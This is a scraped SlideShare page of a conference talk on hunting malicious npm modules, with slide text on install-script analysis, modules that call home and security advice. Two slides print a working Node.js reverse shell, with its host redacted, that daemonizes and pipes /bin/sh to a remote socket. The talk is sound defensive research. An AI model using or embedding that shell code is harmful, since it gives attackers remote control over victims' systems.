Download to read offline
![var net = require('net');
var daemon = require('daemon');
var spawn = require('child_process').spawn;
function c() {
var client = new net.Socket();
client.connect(443, "REDACTED", function() {
var sh = spawn('/bin/sh', []);
client.write("Connectedrn");
client.pipe(sh.stdin);
sh.stdout.pipe(client);
});
client.on('error', function() {});
client.on('close', function() {
setTimeout(c, 5000);
});
}
require('daemon')();
c();
😈
Example](https://image.slidesharecdn.com/nodesummit-huntingformaliciousmodulesinnpm-baldwin-170727024801/85/Hunting-for-malicious-modules-in-npm-NodeSummit-15-320.jpg)
![client.connect(443, "REDACTED", function() {
var sh = spawn('/bin/sh', []);](https://image.slidesharecdn.com/nodesummit-huntingformaliciousmodulesinnpm-baldwin-170727024801/85/Hunting-for-malicious-modules-in-npm-NodeSummit-16-320.jpg)
Uploaded byAdam Baldwin
Hunting for malicious modules in npm - NodeSummit
The document discusses the identification and hunting of malicious modules in the npm ecosystem, highlighting the risks posed by published malicious code and insecure install scripts. It details the extensive analysis of modules and their behaviors, revealing significant findings such as modules that download components over HTTP and those that modify registry settings. The author emphasizes the importance of improved security practices to mitigate the exploitation of these vulnerabilities.
More Related Content
![Spark手把手:[e2-spk-s03]](https://cdn.slidesharecdn.com/ss_thumbnails/e2-spk-s03slides-160619033258-thumbnail.jpg?width=640&height=640&fit=bounds)
Hunting for malicious modules in npm - NodeSummit
- 1.
- 2.
- 3.
- 4.
- 5.
- 6. WHY SHOULD WEHUNT?
- 7. 🕯 Hey, I canpublish malicious code to npm
- 8.
- 9.
- 10.
- 11.
- 12.
- 13. WHAT ARE WEHUNTING?
- 14.
- 15. var net =require('net'); var daemon = require('daemon'); var spawn = require('child_process').spawn; function c() { var client = new net.Socket(); client.connect(443, "REDACTED", function() { var sh = spawn('/bin/sh', []); client.write("Connectedrn"); client.pipe(sh.stdin); sh.stdout.pipe(client); }); client.on('error', function() {}); client.on('close', function() { setTimeout(c, 5000); }); } require('daemon')(); c(); 😈 Example
- 16. client.connect(443, "REDACTED", function(){ var sh = spawn('/bin/sh', []);
- 17. WHERE ARE WEHUNTING?
- 19.
- 20.
- 21.
- 22. 21,756 modules withinstall scripts
- 23. HOW AM IHUNTING?
- 24.
- 25.
- 26. npm install module syscallcapture DB
- 27. npm publish GCS PubSubInstrumentation npmi raw data 🎉
- 28.
- 29. 2.1 TB OFDATA 😲
- 30.
- 31. DNS REQUESTS 339 uniquelookups
- 32.
- 33.
- 34. 144+ modules thatdownload build components over HTTP Insecure Behavior
- 36. Modules that calledhome et_phone_home anarchy harmlesspackage botbait
- 37. Modules that changeregistry settings
- 38.
- 39.
- 40. WHAT DID ILEARN? How can we improve the future
- 41. People will publishmalicious things to the registry
- 42. Your security habitshave a lot to do with if this gets exploited or not
- 43. -Have good passwords -Don'tpublish credentials -Limit the # of publishers
- 44. But what about? Can't they do something?
- 45.